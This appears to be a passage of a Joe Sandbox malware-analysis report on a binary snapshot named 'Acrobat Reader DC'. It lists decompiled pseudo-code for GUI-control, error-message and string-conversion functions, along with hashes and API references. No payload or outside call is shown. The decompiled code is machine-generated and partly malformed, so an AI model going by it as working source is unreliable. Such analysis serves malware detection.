                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                  • API String ID: 3125838495-3381328864
                                  • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                  • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                  • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                  • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E004491B9(void* __eflags, void* __fp0, WCHAR* _a4, signed int _a6, signed int _a8, long _a12) {
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				signed int _v28;
				int _v32;
				long _v52;
				long _v64;
				long _v68;
				int _v72;
				char _v88;
				WCHAR* _v108;
				void* _v120;
				struct tagMENUITEMINFOW _v168;
				WCHAR* _v184;
				void* _v192;
				long _v208;
				void* _v220;
				long _v244;
				long _v256;
				int _v260;
				void* _v8456;
				signed int _t138;
				struct HWND__** _t159;
				intOrPtr _t161;
				intOrPtr _t168;
				long _t169;
				struct HWND__* _t175;
				WCHAR* _t176;

				E00422240(0x2108);
				_t176 = _a8;
				_v24 = 0;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				if(E00441AF5(0x4a8630, _a4,  &_a8,  &_v28) == 0) {
					L13:
					__eflags = 0;
					return 0;
				} else {
					_t161 =  *0x4a8690; // 0x0
					_t168 =  *0x4a86a4; // 0xa51ad0
					_t159 =  *( *(_t168 + _v28 * 4));
					_t138 = _t159[0x22] & 0x000000ff;
					_t175 =  *_t159;
					_a8 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + _a8 * 4))));
					if(_t138 > 3) {
						_t169 = _a12;
						__eflags = _t169;
						if(__eflags == 0) {
							goto L7;
						} else {
							__eflags =  *_t169;
							if(__eflags != 0) {
								goto L13;
							} else {
								goto L7;
							}
						}
					} else {
						switch( *((intOrPtr*)(_t138 * 4 +  &M004497C5))) {
							case 0:
								_v24 = 0x143;
								_v16 = 0x158;
								_v12 = 0x14e;
								_v20 = 0x14b;
								goto L7;
							case 1:
								_v24 = 0x180;
								_v16 = 0x1a2;
								_v12 = 0x186;
								_v20 = 0x184;
								goto L7;
							case 2:
								L7:
								if(_t138 > 0x1c) {
									L66:
									__eflags = _t176;
									if(_t176 == 0) {
										goto L10;
									} else {
										_t140 = SetWindowTextW(_t175, _t176);
										__eflags = _t140;
										if(_t140 == 0) {
											goto L13;
										} else {
											E00430B87(_a8, _t159, 1);
											goto L69;
										}
									}
								} else {
									switch( *((intOrPtr*)(( *(_t138 + 0x44980d) & 0x000000ff) * 4 +  &M004497D5))) {
										case 0:
											if(_t176 != 0) {
												_t144 = SendMessageW(_t175, _v16, 0xffffffff, _t176);
												__eflags = _t144 - 0xffffffff;
												if(_t144 == 0xffffffff) {
													_t145 =  *_t176 & 0x0000ffff;
													_a4 = _t176;
													__eflags = _t145 -  *0x4a8644; // 0x7c
													if(__eflags == 0) {
														L16:
														_a4 = CharNextW(_t176);
														SendMessageW(_t175, _v20, 0, 0);
													} else {
														__eflags = _t145;
														if(__eflags != 0) {
															while(1) {
																L18:
																__eflags = E00430626(__eflags,  &_v8456,  &_a4, 0x4a8644);
																if(__eflags == 0) {
																	break;
																}
																SendMessageW(_t175, _v24, 0,  &_v8456);
															}
															_t150 = _a12;
															__eflags = _t150;
															if(_t150 == 0) {
																goto L69;
															} else {
																_t151 = SendMessageW(_t175, _v16, 0xffffffff, _t150);
																__eflags = _t151 - 0xffffffff;
																if(_t151 == 0xffffffff) {
																	goto L69;
																} else {
																	SendMessageW(_t175, _v12, _t151, 0);
																	return 1;
																}
															}
															goto L70;
														} else {
															goto L16;
														}
													}
													goto L18;
												} else {
													SendMessageW(_t175, _v12, _t144, 0);
													E00430B87(_a8, _t159, 1);
													goto L13;
												}
											} else {
												goto L10;
											}
											goto L70;
										case 1:
											__eax = _a12;
											__eflags = __eax;
											if(__eax == 0) {
												L29:
												SetWindowTextW(__edi, __esi) = SendMessageW(__edi, 0xb1, 0xf4240, 0xf423f);
												_a8[0x72] = 0xffffffff;
												__eax = 1;
												return 1;
											} else {
												__eflags =  *__eax;
												if( *__eax == 0) {
													goto L29;
												} else {
													SendMessageW(__edi, 0xc2, 1, __esi) = 1;
													return 1;
												}
											}
											goto L70;
										case 2:
											 &_v88 = E00432A10(__ecx, __esi,  &_v88, 1, 1);
											__ecx =  &_v88;
											_push( &_v88);
											goto L31;
										case 3:
											L10:
											return _t138 | 0xffffffff;
											goto L70;
										case 4:
											__eax = E00413BED(__esi);
											asm("fnstcw word [ebp+0xa]");
											__eax = _a6 & 0x0000ffff;
											__eax = _a6 & 0x0000ffff | 0x00000c00;
											__eflags = __eax;
											_a12 = __eax;
											__esp = __esp + 4;
											asm("fldcw word [ebp+0x10]");
											asm("fistp qword [ebp-0x1c]");
											__ecx = _v32;
											asm("fldcw word [ebp+0xa]");
											SendMessageW(__edi, 0x402, _v32, 0) = 1;
											return 1;
											goto L70;
										case 5:
											 &_v220 =  *(__ecx + 0x18c);
											_v220 = 1;
											_v208 = __esi;
											__eax = SendMessageW( *(__ecx + 0x18c), 0x133d,  *(__ebx + 0x8b) & 0x000000ff,  &_v220);
											__eflags = __eax;
											if(__eax == 0) {
												goto L13;
											} else {
												__eflags =  *(__ebx + 0x8b) - 0xff;
												if( *(__ebx + 0x8b) == 0xff) {
													goto L69;
												} else {
													__ecx = _a8;
													InvalidateRect( *_a8, 0, 1) = 1;
													return 1;
												}
											}
											goto L70;
										case 6:
											_push(0x208);
											__eax = E004115D7(__edi, __esi, __eflags);
											__ecx = _a4;
											__esp = __esp + 4;
											__edi = __eax;
											__eax =  &_v168;
											_v168.cbSize = 0x30;
											_v168.fMask = 0x10;
											_v168.dwTypeData = __edi;
											_v168.cch = 0x104;
											__eax = GetMenuItemInfoW( *(__ebx + 8), _a4, 0,  &_v168);
											__eflags = __eax;
											if(__eax == 0) {
												L65:
												_push(__edi);
												__eax = E004111DC();
												__esp = __esp + 4;
												__eax = 0;
												__eflags = 0;
												return 0;
											} else {
												__eflags = _v168.fType & 0x00000800;
												if((_v168.fType & 0x00000800) != 0) {
													goto L65;
												} else {
													__ecx = _a4;
													__eax =  &_v168;
													_v168.dwTypeData = __esi;
													__eax = SetMenuItemInfoW( *(__ebx + 8), _a4, 0,  &_v168);
													__eflags = __eax;
													if(__eax == 0) {
														goto L65;
													} else {
														__eax = _a8;
														__ecx =  *_a8;
														__eax = DrawMenuBar( *_a8);
														_push(__edi);
														__eax = E004111DC();
														__esp = __esp + 4;
														__eax = 1;
														return 1;
													}
												}
											}
											goto L70;
										case 7:
											__eax =  *(__ebx + 0xc);
											__ecx =  &_v260;
											_push( &_v260);
											_push(0);
											_push(0x113f);
											_v260 = 1;
											_v256 =  *(__ebx + 0xc);
											_v244 = __esi;
											_push( *(__ebx + 0x30));
											goto L33;
										case 8:
											__eax = E00413BED(__esi);
											__eax = 1;
											return 1;
											goto L70;
										case 9:
											__eflags = __esi;
											if(__esi == 0) {
												goto L10;
											} else {
												__ecx =  &_v120;
												__eax = E00412F40( &_v120, 0, 0x20);
												__ebx = 0;
												__eflags = 0;
												_a4 = __esi;
												while(1) {
													 &_v8456 = E00430626(__eflags,  &_v8456,  &_a4, 0x4a8644);
													__eflags = __al;
													if(__al == 0) {
														break;
													}
													__eflags = _v8456;
													__ecx =  &_v8456;
													_v120 = 4;
													_v108 =  &_v8456;
													if(__eflags == 0) {
														L42:
														__ebx =  &(__ebx->i);
														continue;
													} else {
														__eflags = SendMessageW(__edi, 0x1060, __ebx,  &_v120);
														if(__eflags == 0) {
															goto L13;
														} else {
															goto L42;
														}
													}
													goto L70;
												}
												__eax = E004111C1(__esi);
												__eflags = __eax;
												if(__eax == 0) {
													L45:
													__ecx = _a4;
													_push( &_v120);
													_push(__ebx);
													_v108 = _a4;
													_push(0x1060);
													goto L32;
												} else {
													__eax = E004111C1(__esi);
													__eflags =  *((intOrPtr*)(__esi + __eax * 2 - 2)) -  *0x4a8644;
													if( *((intOrPtr*)(__esi + __eax * 2 - 2)) !=  *0x4a8644) {
														goto L69;
													} else {
														goto L45;
													}
												}
											}
											goto L70;
										case 0xa:
											__ebx =  *(__ebx + 0x30);
											__eflags = __esi;
											if(__esi == 0) {
												goto L10;
											} else {
												 &_v72 = E00412F40( &_v72, 0, 0x28);
												__ecx = _a4;
												__edi = SendMessageW;
												_v192 = 1;
												_v184 = _a4;
												__eax = SendMessageW(__ebx, 0x1053, 0xffffffff,  &_v192);
												_v68 = __eax;
												__eflags = __eax - 0xffffffff;
												if(__eflags == 0) {
													goto L13;
												} else {
													_a12 = 0;
													_a4 = __esi;
													while(1) {
														__eax =  &_a4;
														__ecx =  &_v8456;
														__eax = E00430626(__eflags,  &_v8456,  &_a4, 0x4a8644);
														__eflags = __al;
														if(__al == 0) {
															break;
														}
														__eflags = _v8456;
														__ecx = _a12;
														__eax = 1;
														_v72 = 1;
														_v52 =  &_v8456;
														_v64 = _a12;
														if(__eflags == 0) {
															L53:
															_a12 = _a12 + __eax;
															continue;
														} else {
															__eax = _v68;
															_push( &_v72);
															_push(_v68);
															_push(0x1074);
															_push(__ebx);
															__eax = __edi->i();
															__eflags = _v68;
															if(__eflags == 0) {
																goto L13;
															} else {
																__eax = 1;
																goto L53;
															}
														}
														goto L70;
													}
													__eax = E004111C1(__esi);
													__eflags = __eax;
													if(__eax == 0) {
														L56:
														__eax = _a12;
														__ecx =  &_v72;
														_push( &_v72);
														_v52 = _a4;
														_push(_v68);
														_push(0x1074);
														_push(__ebx);
														_v64 = _a12;
														__eax = __edi->i();
														goto L34;
													} else {
														__eax = E004111C1(__esi);
														__eflags =  *((intOrPtr*)(__esi + __eax * 2 - 2)) -  *0x4a8644;
														if( *((intOrPtr*)(__esi + __eax * 2 - 2)) !=  *0x4a8644) {
															goto L69;
														} else {
															goto L56;
														}
													}
												}
											}
											goto L70;
										case 0xb:
											__eax = E00413BED(__esi);
											 *(__ebx + 0x48) = __eax;
											__eax = 1;
											return 1;
											goto L70;
										case 0xc:
											E00432A10(__ecx, __esi,  &_v88, 1, 1) =  &_v88;
											_push( &_v88);
											L31:
											_push(0);
											_push(0x1002);
											L32:
											_push(__edi);
											L33:
											__eax = SendMessageW();
											L34:
											__eflags = __eax;
											if(__eax != 0) {
												L69:
												return 1;
											} else {
												return __eax;
											}
											goto L70;
										case 0xd:
											goto L66;
									}
								}
								goto L70;
						}
					}
				}
				L70:
			}
































                                  0x004491c1
                                  0x004491cb
                                  0x004491d1
                                  0x004491d4
                                  0x004491d7
                                  0x004491da
                                  0x004491f2
                                  0x004492c9
                                  0x004492c9
                                  0x004492d1
                                  0x004491f8
                                  0x004491fb
                                  0x00449209
                                  0x00449212
                                  0x00449214
                                  0x0044921b
                                  0x0044921d
                                  0x00449223
                                  0x00449268
                                  0x0044926b
                                  0x0044926d
                                  0x00000000
                                  0x0044926f
                                  0x0044926f
                                  0x00449273
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00449273
                                  0x00449225
                                  0x00449225
                                  0x00000000
                                  0x0044922c
                                  0x00449233
                                  0x0044923a
                                  0x00449241
                                  0x00000000
                                  0x00000000
                                  0x0044924a
                                  0x00449251
                                  0x00449258
                                  0x0044925f
                                  0x00000000
                                  0x00000000
                                  0x00449275
                                  0x00449278
                                  0x00449792
                                  0x00449792
                                  0x00449794
                                  0x00000000
                                  0x0044979a
                                  0x0044979c
                                  0x004497a2
                                  0x004497a4
                                  0x00000000
                                  0x004497aa
                                  0x004497b1
                                  0x00000000
                                  0x004497b1
                                  0x004497a4
                                  0x0044927e
                                  0x00449285
                                  0x00000000
                                  0x0044928e
                                  0x004492a4
                                  0x004492aa
                                  0x004492ad
                                  0x004492d4
                                  0x004492d7
                                  0x004492da
                                  0x004492e1
                                  0x004492e8
                                  0x004492f7
                                  0x00449301
                                  0x004492e3
                                  0x004492e3
                                  0x004492e6
                                  0x0044930b
                                  0x0044930b
                                  0x00449320
                                  0x00449322
                                  0x00000000
                                  0x00000000
                                  0x00449332
                                  0x00449332
                                  0x00449336
                                  0x00449339
                                  0x0044933b
                                  0x00000000
                                  0x00449341
                                  0x00449349
                                  0x0044934b
                                  0x0044934e
                                  0x00000000
                                  0x00449354
                                  0x0044935c
                                  0x00449369
                                  0x00449369
                                  0x0044934e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004492e6
                                  0x00000000
                                  0x004492af
                                  0x004492b7
                                  0x004492c4
                                  0x00000000
                                  0x004492c4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004493f7
                                  0x004493fa
                                  0x004493fc
                                  0x00449421
                                  0x00449439
                                  0x00449442
                                  0x0044944c
                                  0x00449457
                                  0x004493fe
                                  0x004493fe
                                  0x00449402
                                  0x00000000
                                  0x00449404
                                  0x00449413
                                  0x0044941e
                                  0x0044941e
                                  0x00449402
                                  0x00000000
                                  0x00000000
                                  0x00449463
                                  0x0044946b
                                  0x0044946e
                                  0x00000000
                                  0x00000000
                                  0x00449290
                                  0x00449299
                                  0x00000000
                                  0x00000000
                                  0x0044936f
                                  0x00449374
                                  0x00449377
                                  0x0044937b
                                  0x0044937b
                                  0x00449380
                                  0x00449383
                                  0x00449386
                                  0x00449389
                                  0x0044938c
                                  0x00449396
                                  0x0044939f
                                  0x004493aa
                                  0x00000000
                                  0x00000000
                                  0x00449693
                                  0x004496a0
                                  0x004496aa
                                  0x004496b0
                                  0x004496b6
                                  0x004496b8
                                  0x00000000
                                  0x004496be
                                  0x004496be
                                  0x004496c5
                                  0x00000000
                                  0x004496cb
                                  0x004496cb
                                  0x004496db
                                  0x004496e6
                                  0x004496e6
                                  0x004496c5
                                  0x00000000
                                  0x00000000
                                  0x004496e9
                                  0x004496ee
                                  0x004496f3
                                  0x004496f9
                                  0x004496fc
                                  0x004496fe
                                  0x00449709
                                  0x00449713
                                  0x0044971d
                                  0x00449720
                                  0x00449727
                                  0x0044972d
                                  0x0044972f
                                  0x0044977e
                                  0x0044977e
                                  0x0044977f
                                  0x00449784
                                  0x00449787
                                  0x00449787
                                  0x0044978f
                                  0x00449731
                                  0x00449731
                                  0x0044973b
                                  0x00000000
                                  0x0044973d
                                  0x0044973d
                                  0x00449743
                                  0x0044974e
                                  0x00449751
                                  0x00449757
                                  0x00449759
                                  0x00000000
                                  0x0044975b
                                  0x0044975b
                                  0x0044975e
                                  0x00449761
                                  0x00449767
                                  0x00449768
                                  0x0044976d
                                  0x00449770
                                  0x0044977b
                                  0x0044977b
                                  0x00449759
                                  0x0044973b
                                  0x00000000
                                  0x00000000
                                  0x00449655
                                  0x0044965b
                                  0x00449661
                                  0x00449662
                                  0x00449664
                                  0x00449669
                                  0x00449673
                                  0x00449679
                                  0x0044967f
                                  0x00000000
                                  0x00000000
                                  0x004493ae
                                  0x004493ca
                                  0x004493d5
                                  0x00000000
                                  0x00000000
                                  0x004494a5
                                  0x004494a7
                                  0x00000000
                                  0x004494ad
                                  0x004494af
                                  0x004494b5
                                  0x004494bd
                                  0x004494bd
                                  0x004494bf
                                  0x004494c9
                                  0x004494d9
                                  0x004494de
                                  0x004494e0
                                  0x00000000
                                  0x00000000
                                  0x004494e2
                                  0x004494ea
                                  0x004494f0
                                  0x004494f7
                                  0x004494fa
                                  0x00449515
                                  0x00449515
                                  0x00000000
                                  0x004494fc
                                  0x0044950d
                                  0x0044950f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044950f
                                  0x00000000
                                  0x004494fa
                                  0x00449519
                                  0x00449521
                                  0x00449523
                                  0x00449540
                                  0x00449540
                                  0x00449546
                                  0x00449547
                                  0x00449548
                                  0x0044954b
                                  0x00000000
                                  0x00449525
                                  0x00449526
                                  0x00449533
                                  0x0044953a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044953a
                                  0x00449523
                                  0x00000000
                                  0x00000000
                                  0x00449555
                                  0x00449558
                                  0x0044955a
                                  0x00000000
                                  0x00449560
                                  0x00449568
                                  0x0044956d
                                  0x00449570
                                  0x00449588
                                  0x00449592
                                  0x00449598
                                  0x0044959a
                                  0x0044959d
                                  0x004495a0
                                  0x00000000
                                  0x004495a6
                                  0x004495a6
                                  0x004495ad
                                  0x004495b0
                                  0x004495b5
                                  0x004495b9
                                  0x004495c0
                                  0x004495c5
                                  0x004495c7
                                  0x00000000
                                  0x00000000
                                  0x004495c9
                                  0x004495d1
                                  0x004495d4
                                  0x004495df
                                  0x004495e2
                                  0x004495e5
                                  0x004495e8
                                  0x00449607
                                  0x00449607
                                  0x00000000
                                  0x004495ea
                                  0x004495ea
                                  0x004495f0
                                  0x004495f1
                                  0x004495f2
                                  0x004495f7
                                  0x004495f8
                                  0x004495fa
                                  0x004495fc
                                  0x00000000
                                  0x00449602
                                  0x00449602
                                  0x00000000
                                  0x00449602
                                  0x004495fc
                                  0x00000000
                                  0x004495e8
                                  0x0044960d
                                  0x00449615
                                  0x00449617
                                  0x00449634
                                  0x00449637
                                  0x0044963a
                                  0x0044963d
                                  0x0044963e
                                  0x00449644
                                  0x00449645
                                  0x0044964a
                                  0x0044964b
                                  0x0044964e
                                  0x00000000
                                  0x00449619
                                  0x0044961a
                                  0x00449627
                                  0x0044962e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044962e
                                  0x00449617
                                  0x004495a0
                                  0x00000000
                                  0x00000000
                                  0x004493d9
                                  0x004493e6
                                  0x004493e9
                                  0x004493f4
                                  0x00000000
                                  0x00000000
                                  0x0044949f
                                  0x004494a2
                                  0x0044946f
                                  0x0044946f
                                  0x00449471
                                  0x00449476
                                  0x00449476
                                  0x00449477
                                  0x00449477
                                  0x0044947d
                                  0x0044947d
                                  0x0044947f
                                  0x004497b8
                                  0x004497c1
                                  0x0044948b
                                  0x0044948b
                                  0x0044948b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00449285
                                  0x00000000
                                  0x00000000
                                  0x00449225
                                  0x00449223
                                  0x00000000

                                  APIs
                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                  • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                  • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                  • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$CharNext
                                  • String ID:
                                  • API String ID: 1350042424-0
                                  • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                  • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                  • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                  • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E0045E737(void* __fp0, struct HINSTANCE__* _a4, int _a8, intOrPtr _a12) {
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v52;
				char _v68;
				WCHAR* _v84;
				short _v8280;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t51;
				intOrPtr _t96;
				WCHAR* _t100;
				WCHAR* _t118;
				intOrPtr _t119;
				intOrPtr _t129;
				intOrPtr _t131;
				struct HINSTANCE__* _t132;
				void* _t146;

				_t146 = __fp0;
				_t51 = E00422240(0x2058);
				if( *0x4974e2 == 0) {
					_t51 = _a4;
					_t138 =  *((intOrPtr*)(_t51 + 0xf8)) - 1;
					if( *((intOrPtr*)(_t51 + 0xf8)) != 1) {
						LoadStringW( *0x497520, 0x66,  &_v8280, 0xfff);
						_t118 =  &_v8280;
						E00401B10(_t118,  &_v84, _t138);
						_t111 =  *0x497520;
						LoadStringW( *0x497520, _a8, _t118, 0xfff);
						E00401B10(_t118,  &_v68, _t138);
						_t129 =  *((intOrPtr*)(_a4 + 0xf4));
						_v36 = E004348DE(_t129);
						_t119 = E004348AA(_t129);
						_v28 = _t119;
						_t96 = E00434908(E0043492F(_t129));
						_v32 = _t96;
						_t100 =  &_v8280;
						_t139 = _t96;
						if(_t96 == 0) {
							_t111 = _a4;
							_push( *((intOrPtr*)(_a4 + 0xc8)));
							_push(_t129);
						} else {
							_push(_t96);
							_push(_t119);
						}
						_push(L"Line %d  (File \"%s\"):\n\n");
						_push(_t100);
						E0041329B(_t111);
						E00401B10( &_v8280,  &_v24, _t139);
						_t131 = _v36;
						_t140 = _t131;
						if(_t131 != 0) {
							E0040D200( &_v24, _t100, _t131, _t146);
							E0040D200( &_v24, _t100, "\n", _t146);
						}
						_t101 =  &_v52;
						E0040BC70( &_v52, _t140);
						_t121 = _a12;
						if(_a12 >= 0) {
							E0040C600(E00402160( &_v52, _t131, _t111, _t121) | 0xffffffff,  &_v52, _t121);
							E0040D200( &_v52,  &_v52, L"^ ERROR", _t146);
							E0040BD50( &_v24, _t146,  &_v52);
							E0040D200( &_v24,  &_v52, "\n", _t146);
							_t96 = _v32;
						}
						E0040D200( &_v24, _t101, L"\nError: ", _t146);
						E0040BD50( &_v24, _t146,  &_v68);
						if( *0x4974e8 == 0) {
							MessageBoxW( *0x497518, _v24, _v84, 0x11010);
							goto L14;
						} else {
							_t144 = _t96;
							if(_t96 == 0) {
								_t132 = _a4;
								_push(_v68);
								_push( *((intOrPtr*)(_t132 + 0xf4)));
								_push( *((intOrPtr*)(_t132 + 0xc8)));
								_push(L"%s (%d) : ==> %s:\n");
								E00413ABE(_t96, _v68, L"\nError: ", _t132, __eflags);
								L15:
								 *((intOrPtr*)(_t132 + 0xf8)) = 1;
								if( *((char*)(_t132 + 0x118)) == 0) {
									 *0x4974f4 = 1;
								} else {
									 *0x4974f4 = _a8 + 0x7ffff000;
								}
								E00402250( &_v52);
								E00402250( &_v24);
								E00402250( &_v68);
								return E00402250( &_v84);
							}
							_push(_v52);
							_push(_t131);
							_push(_v68);
							_push(_v28);
							_push(_t96);
							_push(L"%s (%d) : ==> %s:\n%s\n%s\n");
							E00413ABE(_t96, _v52, L"\nError: ", _t131, _t144);
							L14:
							_t132 = _a4;
							goto L15;
						}
					}
				}
				return _t51;
			}
























                                  0x0045e737
                                  0x0045e73f
                                  0x0045e74e
                                  0x0045e754
                                  0x0045e757
                                  0x0045e75e
                                  0x0045e77f
                                  0x0045e781
                                  0x0045e78a
                                  0x0045e792
                                  0x0045e7a0
                                  0x0045e7a5
                                  0x0045e7ad
                                  0x0045e7ba
                                  0x0045e7c2
                                  0x0045e7c5
                                  0x0045e7d3
                                  0x0045e7d5
                                  0x0045e7d8
                                  0x0045e7de
                                  0x0045e7e0
                                  0x0045e7e6
                                  0x0045e7ef
                                  0x0045e7f0
                                  0x0045e7e2
                                  0x0045e7e2
                                  0x0045e7e3
                                  0x0045e7e3
                                  0x0045e7f1
                                  0x0045e7f6
                                  0x0045e7f7
                                  0x0045e808
                                  0x0045e80d
                                  0x0045e810
                                  0x0045e812
                                  0x0045e819
                                  0x0045e826
                                  0x0045e826
                                  0x0045e82b
                                  0x0045e82e
                                  0x0045e833
                                  0x0045e838
                                  0x0045e84c
                                  0x0045e859
                                  0x0045e865
                                  0x0045e872
                                  0x0045e877
                                  0x0045e877
                                  0x0045e882
                                  0x0045e88e
                                  0x0045e89a
                                  0x0045e8f5
                                  0x00000000
                                  0x0045e89c
                                  0x0045e89c
                                  0x0045e89e
                                  0x0045e8c0
                                  0x0045e8cf
                                  0x0045e8d0
                                  0x0045e8d1
                                  0x0045e8d2
                                  0x0045e8d7
                                  0x0045e8fe
                                  0x0045e90a
                                  0x0045e910
                                  0x0045e923
                                  0x0045e912
                                  0x0045e91b
                                  0x0045e91b
                                  0x0045e92b
                                  0x0045e933
                                  0x0045e93b
                                  0x00000000
                                  0x0045e943
                                  0x0045e8a9
                                  0x0045e8aa
                                  0x0045e8ab
                                  0x0045e8ac
                                  0x0045e8ad
                                  0x0045e8ae
                                  0x0045e8b3
                                  0x0045e8fb
                                  0x0045e8fb
                                  0x00000000
                                  0x0045e8fb
                                  0x0045e89a
                                  0x0045e75e
                                  0x0045e94e

                                  APIs
                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                  • __swprintf.LIBCMT ref: 0045E7F7
                                  • _wprintf.LIBCMT ref: 0045E8B3
                                  • _wprintf.LIBCMT ref: 0045E8D7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 2295938435-2354261254
                                  • Opcode ID: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                  • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                  • Opcode Fuzzy Hash: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                  • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004531B1(intOrPtr* _a4) {
				char _v20;
				char _v152;
				intOrPtr _t30;
				signed int _t31;
				intOrPtr* _t38;

				_t38 = _a4;
				_t30 =  *((intOrPtr*)(_t38 + 8));
				if(_t30 == 4) {
					return _t30;
				} else {
					_t31 = _t30 - 1;
					if(_t31 > 0xa) {
						L17:
						_v152 = 0;
						goto L18;
					} else {
						switch( *((intOrPtr*)(_t31 * 4 +  &M00453385))) {
							case 0:
								E0041305C( *_t38,  &_v152, 0xa);
								_t50 = _t50 + 0xc;
								goto L18;
							case 1:
								__eax =  *(__ebx + 4);
								__ecx =  *__ebx;
								_t7 =  &_v152; // -148
								__edx = _t7;
								__eax = E00413109( *__ebx,  *(__ebx + 4), _t7, 0xa);
								goto L18;
							case 2:
								__esp = __esp - 8;
								 *__esp =  *__ebx;
								_t8 =  &_v152; // -148
								__edx = _t8;
								_push(L"%.15g");
								_push(__edx);
								__eax = E0041329B(__edx);
								__esp = __esp + 0x10;
								goto L18;
							case 3:
								goto L17;
							case 4:
								__eax =  *__ebx;
